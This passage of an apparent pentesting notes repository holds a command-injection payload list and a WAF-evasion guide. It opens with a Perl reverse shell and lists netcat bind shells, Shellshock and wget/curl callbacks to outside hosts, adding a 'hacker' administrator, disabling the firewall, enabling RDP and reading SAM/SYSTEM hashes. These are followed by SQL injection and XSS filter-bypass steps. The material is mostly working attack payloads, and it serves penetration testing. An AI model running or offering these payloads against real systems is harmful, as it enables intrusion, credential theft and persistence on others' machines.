Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 215 | () { :;}; echo vulnerable 10 216 | eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 217 | eval('ls') 218 | eval('pwd') 219 | eval('pwd'); 220 | eval('sleep 5') 221 | eval('sleep 5'); 222 | eval('whoami') 223 | eval('whoami'); 224 | exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 225 | exec('ls') 226 | exec('pwd') 227 | exec('pwd'); 228 | exec('sleep 5') 229 | exec('sleep 5'); 230 | exec('whoami') 231 | exec('whoami'); 232 | ;{$_GET["cmd"]} 233 | `id` 234 | |id 235 | | id 236 | ;id 237 | ;id| 238 | ;id; 239 | & id 240 | &&id 241 | ;id\n 242 | ifconfig 243 | | ifconfig 244 | ; ifconfig 245 | & ifconfig 246 | && ifconfig 247 | /index.html|id| 248 | ipconfig 249 | | ipconfig /all 250 | ; ipconfig /all 251 | & ipconfig /all 252 | && ipconfig /all 253 | ipconfig /all 254 | ls 255 | $(`ls`) 256 | | ls -l / 257 | ; ls -l / 258 | & ls -l / 259 | && ls -l / 260 | ls -l / 261 | | ls -laR /etc 262 | ; ls -laR /etc 263 | & ls -laR /etc 264 | && ls -laR /etc 265 | | ls -laR /var/www 266 | ; ls -laR /var/www 267 | & ls -laR /var/www 268 | && ls -laR /var/www 269 | | ls -l /etc/ 270 | ; ls -l /etc/ 271 | & ls -l /etc/ 272 | && ls -l /etc/ 273 | ls -l /etc/ 274 | ls -lh /etc/ 275 | | ls -l /home/* 276 | ; ls -l /home/* 277 | & ls -l /home/* 278 | && ls -l /home/* 279 | ls -l /home/* 280 | *; ls -lhtR /var/www/ 281 | | ls -l /tmp 282 | ; ls -l /tmp 283 | & ls -l /tmp 284 | && ls -l /tmp 285 | ls -l /tmp 286 | | ls -l /var/www/* 287 | ; ls -l /var/www/* 288 | & ls -l /var/www/* 289 | && ls -l /var/www/* 290 | ls -l /var/www/* 291 | \n 292 | \n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` 293 | \n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` 294 | \n/bin/ls -al\n 295 | | nc -lvvp 4444 -e /bin/sh| 296 | ; nc -lvvp 4444 -e /bin/sh; 297 | & nc -lvvp 4444 -e /bin/sh& 298 | && nc -lvvp 4444 -e /bin/sh & 299 | nc -lvvp 4444 -e /bin/sh 300 | nc -lvvp 4445 -e /bin/sh & 301 | nc -lvvp 4446 -e /bin/sh| 302 | nc -lvvp 4447 -e /bin/sh; 303 | nc -lvvp 4448 -e /bin/sh& 304 | \necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n 305 | \necho INJECTX\nexit\n\033[2Asleep 5\n 306 | \necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n 307 | | net localgroup Administrators hacker /ADD 308 | ; net localgroup Administrators hacker /ADD 309 | & net localgroup Administrators hacker /ADD 310 | && net localgroup Administrators hacker /ADD 311 | net localgroup Administrators hacker /ADD 312 | | netsh firewall set opmode disable 313 | ; netsh firewall set opmode disable 314 | & netsh firewall set opmode disable 315 | && netsh firewall set opmode disable 316 | netsh firewall set opmode disable 317 | netstat 318 | ;netstat -a; 319 | | netstat -an 320 | ; netstat -an 321 | & netstat -an 322 | && netstat -an 323 | netstat -an 324 | | net user hacker Password1 /ADD 325 | ; net user hacker Password1 /ADD 326 | & net user hacker Password1 /ADD 327 | && net user hacker Password1 /ADD 328 | net user hacker Password1 /ADD 329 | | net view 330 | ; net view 331 | & net view 332 | && net view 333 | net view 334 | \nid| 335 | \nid; 336 | \nid\n 337 | \n/usr/bin/id\n 338 | perl -e 'print "X"x1024' 339 | || perl -e 'print "X"x16096' 340 | | perl -e 'print "X"x16096' 341 | ; perl -e 'print "X"x16096' 342 | & perl -e 'print "X"x16096' 343 | && perl -e 'print "X"x16096' 344 | perl -e 'print "X"x16384' 345 | ; perl -e 'print "X"x2048' 346 | & perl -e 'print "X"x2048' 347 | && perl -e 'print "X"x2048' 348 | perl -e 'print "X"x2048' 349 | || perl -e 'print "X"x4096' 350 | | perl -e 'print "X"x4096' 351 | ; perl -e 'print "X"x4096' 352 | & perl -e 'print "X"x4096' 353 | && perl -e 'print "X"x4096' 354 | perl -e 'print "X"x4096' 355 | || perl -e 'print "X"x8096' 356 | | perl -e 'print "X"x8096' 357 | ; perl -e 'print "X"x8096' 358 | && perl -e 'print "X"x8096' 359 | perl -e 'print "X"x8192' 360 | perl -e 'print "X"x81920' 361 | || phpinfo() 362 | | phpinfo() 363 | {${phpinfo()}} 364 | ;phpinfo() 365 | ;phpinfo();// 366 | ';phpinfo();// 367 | {${phpinfo()}} 368 | & phpinfo() 369 | && phpinfo() 370 | phpinfo() 371 | phpinfo(); 372 | 373 | 374 | 375 | 376 | 377 | 378 | 379 | :phpversion(); 380 | `ping 127.0.0.1` 381 | & ping -i 30 127.0.0.1 & 382 | & ping -n 30 127.0.0.1 & 383 | ;${@print(md5(RCEVulnerable))}; 384 | ${@print("RCEVulnerable")} 385 | ${@print(system($_SERVER['HTTP_USER_AGENT']))} 386 | pwd 387 | | pwd 388 | ; pwd 389 | & pwd 390 | && pwd 391 | \r 392 | | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 393 | ; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 394 | & reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 395 | && reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 396 | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 397 | \r\n 398 | route 399 | | sleep 1 400 | ; sleep 1 401 | & sleep 1 402 | && sleep 1 403 | sleep 1 404 | || sleep 10 405 | | sleep 10 406 | ; sleep 10 407 | {${sleep(10)}} 408 | & sleep 10 409 | && sleep 10 410 | sleep 10 411 | || sleep 15 412 | | sleep 15 413 | ; sleep 15 414 | & sleep 15 415 | && sleep 15 416 | {${sleep(20)}} 417 | {${sleep(20)}} 418 | {${sleep(3)}} 419 | {${sleep(3)}} 420 | | sleep 5 421 | ; sleep 5 422 | & sleep 5 423 | && sleep 5 424 | sleep 5 425 | {${sleep(hexdec(dechex(20)))}} 426 | {${sleep(hexdec(dechex(20)))}} 427 | sysinfo 428 | | sysinfo 429 | ; sysinfo 430 | & sysinfo 431 | && sysinfo 432 | system('cat C:\boot.ini'); 433 | system('cat config.php'); 434 | || system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 435 | | system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 436 | ; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 437 | & system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 438 | && system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 439 | system('curl https://crowdshield.com/.testing/rce_vuln.txt') 440 | system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') 441 | system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); 442 | system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 443 | systeminfo 444 | | systeminfo 445 | ; systeminfo 446 | & systeminfo 447 | && systeminfo 448 | system('ls') 449 | system('pwd') 450 | system('pwd'); 451 | || system('sleep 5'); 452 | | system('sleep 5'); 453 | ; system('sleep 5'); 454 | & system('sleep 5'); 455 | && system('sleep 5'); 456 | system('sleep 5') 457 | system('sleep 5'); 458 | system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') 459 | system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); 460 | system('whoami') 461 | system('whoami'); 462 | test*; ls -lhtR /var/www/ 463 | test* || perl -e 'print "X"x16096' 464 | test* | perl -e 'print "X"x16096' 465 | test* & perl -e 'print "X"x16096' 466 | test* && perl -e 'print "X"x16096' 467 | test*; perl -e 'print "X"x16096' 468 | $(`type C:\boot.ini`) 469 | &&type C:\\boot.ini 470 | | type C:\Windows\repair\SAM 471 | ; type C:\Windows\repair\SAM 472 | & type C:\Windows\repair\SAM 473 | && type C:\Windows\repair\SAM 474 | type C:\Windows\repair\SAM 475 | | type C:\Windows\repair\SYSTEM 476 | ; type C:\Windows\repair\SYSTEM 477 | & type C:\Windows\repair\SYSTEM 478 | && type C:\Windows\repair\SYSTEM 479 | type C:\Windows\repair\SYSTEM 480 | | type C:\WINNT\repair\SAM 481 | ; type C:\WINNT\repair\SAM 482 | & type C:\WINNT\repair\SAM 483 | && type C:\WINNT\repair\SAM 484 | type C:\WINNT\repair\SAM 485 | type C:\WINNT\repair\SYSTEM 486 | | type %SYSTEMROOT%\repair\SAM 487 | ; type %SYSTEMROOT%\repair\SAM 488 | & type %SYSTEMROOT%\repair\SAM 489 | && type %SYSTEMROOT%\repair\SAM 490 | type %SYSTEMROOT%\repair\SAM 491 | | type %SYSTEMROOT%\repair\SYSTEM 492 | ; type %SYSTEMROOT%\repair\SYSTEM 493 | & type %SYSTEMROOT%\repair\SYSTEM 494 | && type %SYSTEMROOT%\repair\SYSTEM 495 | type %SYSTEMROOT%\repair\SYSTEM 496 | uname 497 | ;uname; 498 | | uname -a 499 | ; uname -a 500 | & uname -a 501 | && uname -a 502 | uname -a 503 | |/usr/bin/id 504 | ;|/usr/bin/id| 505 | ;/usr/bin/id| 506 | $;/usr/bin/id 507 | () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' 508 | () { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 509 | | wget http://crowdshield.com/.testing/rce.txt 510 | & wget http://crowdshield.com/.testing/rce.txt 511 | ; wget https://crowdshield.com/.testing/rce_vuln.txt 512 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt`) 513 | && wget https://crowdshield.com/.testing/rce_vuln.txt 514 | wget https://crowdshield.com/.testing/rce_vuln.txt 515 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) 516 | which curl 517 | which gcc 518 | which nc 519 | which netcat 520 | which perl 521 | which python 522 | which wget 523 | whoami 524 | | whoami 525 | ; whoami 526 | ' whoami 527 | ' || whoami 528 | ' & whoami 529 | ' && whoami 530 | '; whoami 531 | " whoami 532 | " || whoami 533 | " | whoami 534 | " & whoami 535 | " && whoami 536 | "; whoami 537 | $(`whoami`) 538 | & whoami 539 | && whoami 540 | {{ get_user_file("C:\boot.ini") }} 541 | {{ get_user_file("/etc/hosts") }} 542 | {{4+4}} 543 | {{4+8}} 544 | {{person.secret}} 545 | {{person.name}} 546 | {1} + {1} 547 | {% For c in [1,2,3]%} {{c, c, c}} {% endfor%} 548 | {{[] .__ Class __.__ base __.__ subclasses __ ()}} 549 | ``` 550 | 551 | **References :** 552 | 553 | **Testing for Command Injection \(OTG-INPVAL-013\)** 554 | 555 | * 👉 [owasp.org/index.php/Testing\_for\_Command\_Injection\_\(OTG-INPVAL-013\)](https://www.owasp.org/index.php/Testing_for_Command_Injection_%28OTG-INPVAL-013%29) 556 | 557 | **OWASP Command Injection** 558 | 559 | * 👉 [owasp.org/index.php/Command\_Injection](https://www.owasp.org/index.php/Command_Injection) 560 | 561 | **WE-77: Improper Neutralization of Special Elements used in a Command \('Command Injection'\)** 562 | 563 | * 👉 [http://cwe.mitre.org/data/definitions/77.html](http://cwe.mitre.org/data/definitions/77.html) 564 | 565 | **WE-78: Improper Neutralization of Special Elements used in an OS Command \('OS Command Injection'** 566 | 567 | * 👉 [http://cwe.mitre.org/data/definitions/78.html](http://cwe.mitre.org/data/definitions/78.html) 568 | 569 | **Portswigger Web Security - OS Command Injection** 570 | 571 | * 👉 [portswigger.net/kb/issues/00100100\_os-command-injection](https://portswigger.net/kb/issues/00100100_os-command-injection) 572 | 573 | 574 | 575 | 576 | 577 | -------------------------------------------------------------------------------- /waf-bypasses/testing-methodology-evasion-techniques.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: via 0xInfection's excellent AwesomeWAF page (in resources) 3 | --- 4 | 5 | # Testing Methodology/Evasion techniques 6 | 7 | #### Where To Look: 8 | 9 | * Always look out for common ports that expose that a WAF, namely `80`, `443`, `8000`, `8008`, `8080` and `8088` ports. 10 | 11 | > **Tip:** You can use automate this easily by commandline using tools like like [cURL](https://github.com/curl/curl). 12 | 13 | * Some WAFs set their own cookies in requests \(eg. Citrix Netscaler, Yunsuo WAF\). 14 | * Some associate themselves with separate headers \(eg. Anquanbao WAF, Amazon AWS WAF\). 15 | * Some often alter headers and jumble characters to confuse attacker \(eg. Netscaler, Big-IP\). 16 | * Some expose themselves in the `Server` header \(eg. Approach, WTS WAF\). 17 | * Some WAFs expose themselves in the response content \(eg. DotDefender, Armor, Sitelock\). 18 | * Other WAFs reply with unusual response codes upon malicious requests \(eg. WebKnight, 360 WAF\). 19 | 20 | #### Detection Techniques: 21 | 22 | To identify WAFs, we need to \(dummy\) provoke it. 23 | 24 | 1. Make a normal GET request from a browser, intercept and record response headers \(specifically cookies\). 25 | 2. Make a request from command line \(eg. cURL\), and test response content and headers \(no user-agent included\). 26 | 3. Make GET requests to random open ports and grab banners which might expose the WAFs identity. 27 | 4. If there is a login page somewhere, try some common \(easily detectable\) payloads like `" or 1 = 1 --`. 28 | 5. If there is some input field somewhere, try with noisy payloads like ``. 29 | 6. Attach a dummy `../../../etc/passwd` to a random parameter at end of URL. 30 | 7. Append some catchy keywords like `' OR SLEEP(5) OR '` at end of URLs to any random parameter. 31 | 8. Make GET requests with outdated protocols like `HTTP/0.9` \(`HTTP/0.9` does not support POST type queries\). 32 | 9. Many a times, the WAF varies the `Server` header upon different types of interactions. 33 | 10. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response. 34 | 35 | > **Tip:** This method could be easily achieved with tools like [HPing3](http://www.hping.org/) or [Scapy](https://scapy.net/). 36 | 37 | 11. Side Channel Attacks - Examine the timing behaviour of the request and response content. 38 | 39 | 40 | 41 | #### Fuzzing/Bruteforcing: 42 | 43 | **Method:** 44 | 45 | Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists: 46 | 47 | * Wordlists specifically for fuzzing 48 | * [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing). 49 | * [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) 50 | * [Other Payloads](https://github.com/foospidy/payloads) 51 | 52 | **Technique:** 53 | 54 | * Load up your wordlist into fuzzer and start the bruteforce. 55 | * Record/log all responses from the different payloads fuzzed. 56 | * Use random user-agents, ranging from Chrome Desktop to iPhone browser. 57 | * If blocking noticed, increase fuzz latency \(eg. 2-4 secs\). 58 | * Always use proxychains, since chances are real that your IP gets blocked. 59 | 60 | **Drawbacks:** 61 | 62 | * This method often fails. 63 | * Many a times your IP will be blocked \(temporarily/permanently\). 64 | 65 | #### Regex Reversing: 66 | 67 | **Method:** 68 | 69 | * Most efficient method of bypassing WAFs. 70 | * Some WAFs rely upon matching the attack payloads with the signatures in their databases. 71 | * Payload matches the reg-ex the WAF triggers alarm. 72 | 73 | **Techniques:** 74 | 75 | #### Blacklisting Detection/Bypass 76 | 77 | * In this method we try to fingerprint the rules step by step by observing the keywords being blacklisted. 78 | * The idea is to guess the regex and craft the next payloads which doesn't use the blacklisted keywords. 79 | 80 | **Case**: SQL Injection 81 | 82 | **• Step 1:** 83 | 84 | **Keywords Filtered**: `and`, `or`, `union` 85 | **Probable Regex**: `preg_match('/(and|or|union)/i', $id)` 86 | 87 | * **Blocked Attempt**: `union select user, password from users` 88 | * **Bypassed Injection**: `1 || (select user from users where user_id = 1) = 'admin'` 89 | 90 | **• Step 2:** 91 | 92 | **Keywords Filtered**: `and`, `or`, `union`, `where` 93 | 94 | * **Blocked Attempt**: `1 || (select user from users where user_id = 1) = 'admin'` 95 | * **Bypassed Injection**: `1 || (select user from users limit 1) = 'admin'` 96 | 97 | **• Step 3:** 98 | 99 | **Keywords Filtered**: `and`, `or`, `union`, `where`, `limit` 100 | 101 | * **Blocked Attempt**: `1 || (select user from users limit 1) = 'admin'` 102 | * **Bypassed Injection**: `1 || (select user from users group by user_id having user_id = 1) = 'admin'` 103 | 104 | **• Step 4:** 105 | 106 | **Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by` 107 | 108 | * **Blocked Attempt**: `1 || (select user from users group by user_id having user_id = 1) = 'admin'` 109 | * **Bypassed Injection**: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1` 110 | 111 | **• Step 5:** 112 | 113 | **Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`, `select` 114 | 115 | * **Blocked Attempt**: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1` 116 | * **Bypassed Injection**: `1 || 1 = 1 into outfile 'result.txt'` 117 | * **Bypassed Injection**: `1 || substr(user,1,1) = 'a'` 118 | 119 | **• Step 6:** 120 | 121 | **Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'` 122 | 123 | * **Blocked Attempt**: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1` 124 | * **Bypassed Injection**: `1 || user_id is not null` 125 | * **Bypassed Injection**: `1 || substr(user,1,1) = 0x61` 126 | * **Bypassed Injection**: `1 || substr(user,1,1) = unhex(61)` 127 | 128 | **• Step 7:** 129 | 130 | **Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex` 131 | 132 | * **Blocked Attempt**: `1 || substr(user,1,1) = unhex(61)` 133 | * **Bypassed Injection**: `1 || substr(user,1,1) = lower(conv(11,10,36))` 134 | 135 | **• Step 8:** 136 | 137 | **Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr` 138 | 139 | * **Blocked Attempt**: `1 || substr(user,1,1) = lower(conv(11,10,36))` 140 | * **Bypassed Injection**: `1 || lpad(user,7,1)` 141 | 142 | **• Step 9:** 143 | 144 | **Keywords Filtered**: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space` 145 | 146 | * **Blocked Attempt**: `1 || lpad(user,7,1)` 147 | * **Bypassed Injection**: `1%0b||%0blpad(user,7,1)` 148 | 149 | #### Obfuscation: 150 | 151 | **Method:** 152 | 153 | * Encoding payload to different encodings \(a hit and trial approach\). 154 | * You can encode whole payload, or some parts of it and test recursively. 155 | 156 | **Techniques:** 157 | 158 | **1. Case Toggling** 159 | 160 | * Some poorly developed WAFs filter selectively specific case WAFs. 161 | * We can combine upper and lower case characters for developing efficient payloads. 162 | 163 | **Standard**: `` 164 | **Bypassed**: `` 165 | 166 | **Standard**: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'` 167 | **Bypassed**: `sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'` 168 | 169 | **2. URL Encoding** 170 | 171 | * Encode normal payloads with % encoding/URL encoding. 172 | * Can be done with online tools like [this](https://www.url-encode-decode.com/). 173 | * Burp includes a in-built encoder/decoder. 174 | 175 | **Blocked**: `` 187 | **Obfuscated**: `` 188 | 189 | **Blocked**: `/?redir=http://google.com` 190 | **Bypassed**: `/?redir=http://google。com` \(Unicode alternative\) 191 | 192 | **Blocked**: `x` 193 | **Bypassed**: `<marquee loop=1 onfinish=alert︵1)>x` \(Unicode alternative\) 194 | 195 | > **TIP:** Have a look at [this](https://hackerone.com/reports/231444) and [this](https://hackerone.com/reports/231389) reports on HackerOne. :\) 196 | 197 | **Standard**: `../../etc/passwd` 198 | **Obfuscated**: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd` 199 | 200 | **4. HTML Representation** 201 | 202 | * Often web apps encode special characters into HTML encoding and render them accordingly. 203 | * This leads us to basic bypass cases with HTML encoding \(numeric/generic\). 204 | 205 | **Standard**: `">` 206 | **Encoded**: `"><img src=x onerror=confirm()>` \(General form\) 207 | **Encoded**: `"><img src=x onerror=confirm()>` \(Numeric reference\) 208 | 209 | **5. Mixed Encoding** 210 | 211 | * Sometimes, WAF rules often tend to filter out a specific type of encoding. 212 | * This type of filters can be bypassed by mixed encoding payloads. 213 | * Tabs and newlines further add to obfuscation. 214 | 215 | **Obfuscated**: 216 | 217 | ```text 218 | XSS 220 | ``` 221 | 222 | **6. Using Comments** 223 | 224 | * Comments obfuscate standard payload vectors. 225 | * Different payloads have different ways of obfuscation. 226 | 